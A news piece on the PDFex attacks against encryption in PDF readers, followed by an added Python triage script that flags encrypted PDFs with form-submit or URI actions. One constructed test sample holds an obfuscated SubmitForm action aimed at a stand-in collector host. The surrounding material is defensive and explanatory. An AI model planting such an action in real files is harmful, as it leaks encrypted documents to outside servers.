Critical vulnerability found in PDF files turns them into “zombies”


The encryption system of PDF files contains a critical vulnerability, according to German cyber security experts. This concerns the protection built into the PDF standard itself, not external encryption tools. Based on the vulnerabilities they found, the experts modeled an attack, which they named “PDFex”.

While studying the vulnerabilities, the German hackers discovered two possible ways to exploit them. In practical tests they cracked 27 PC applications and web applications for reading PDF files, including Adobe Acrobat, Foxit Reader, Nitro, and the built-in PDF viewers in Chrome and Firefox. In all cases they managed to retrieve data that was considered encrypted and secure.

The first type of PDFex attack is called “direct exfiltration”. It turns out that the encryption system covers not the whole PDF file, but only part of it. The attacker therefore retains access to the unencrypted parts and can modify them, for example by adding an instruction that forwards the user's data to a fake address at the moment of decryption.

The second type of attack relies on CBC tools to spoof encrypted sections directly in the file. The aim here is to create a “mined” file that will itself send its contents to a remote server using PDF forms or URLs. In both cases, carrying out a PDFex attack requires direct access to the file, or at least the ability to intercept the user's network traffic. The vulnerability is considered critical and will be described in detail at an upcoming network security conference, the ACM Conference on Computer and Communications Security.
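
A defender-side triage heuristic for the two outbound channels named above, PDF forms and URLs, written as an added example (not code from the researchers or from any PDF vendor). It flags an encrypted PDF that carries a form-submit or URI action together with a URL readable in the clear; the sample bytes, the `collector.example` host and the function names are constructed for illustration.

```python
import re

# PDF names start with "/" and may hide characters as #xx hex escapes.
NAME_RE = re.compile(rb"/([^\s/\[\]<>(){}%]+)")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A literal string that reads as a plain http(s) URL.
URL_RE = re.compile(rb"\(\s*(https?://[\x21-\x7e]*?)\)")

# Action types matching the "PDF forms or URLs" channels in the article.
OUTBOUND = {b"SubmitForm", b"URI"}

def pdf_names(data):
    """Return the set of PDF names in the raw bytes, with #xx escapes decoded."""
    unhex = lambda h: bytes([int(h.group(1), 16)])
    return {HEX_RE.sub(unhex, m.group(1)) for m in NAME_RE.finditer(data)}

def triage(data):
    """Heuristic only: a raw byte scan does not see inside compressed streams."""
    names = pdf_names(data)
    encrypted = b"Encrypt" in names          # trailer references an /Encrypt dict
    outbound = sorted(n.decode() for n in names & OUTBOUND)
    urls = sorted({m.group(1).decode() for m in URL_RE.finditer(data)})
    return {
        "encrypted": encrypted,
        "outbound_actions": outbound,
        "plaintext_urls": urls,
        # String values in an encrypted PDF are normally stored as ciphertext,
        # so a readable URL next to an outbound action deserves manual review.
        "review": encrypted and bool(outbound) and bool(urls),
    }

# Constructed sample: encrypted file, obfuscated action name, readable target.
SAMPLE_FLAGGED = (
    b"%PDF-1.7\n"
    b"2 0 obj << /S /Submit#46orm /F (http://collector.example/in) >> endobj\n"
    b"trailer << /Root 1 0 R /Encrypt 9 0 R >>\n"
)
# Constructed sample: encrypted file whose link target is stored as ciphertext.
SAMPLE_CLEAN = (
    b"%PDF-1.7\n"
    b"2 0 obj << /S /URI /URI <8f1c2a77d0> >> endobj\n"
    b"trailer << /Root 1 0 R /Encrypt 9 0 R >>\n"
)

if __name__ == "__main__":
    for label, blob in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(label, triage(blob))
```

A hit means the file should be opened only in an isolated viewer with network access blocked until it has been inspected; the absence of a hit does not prove the file is safe.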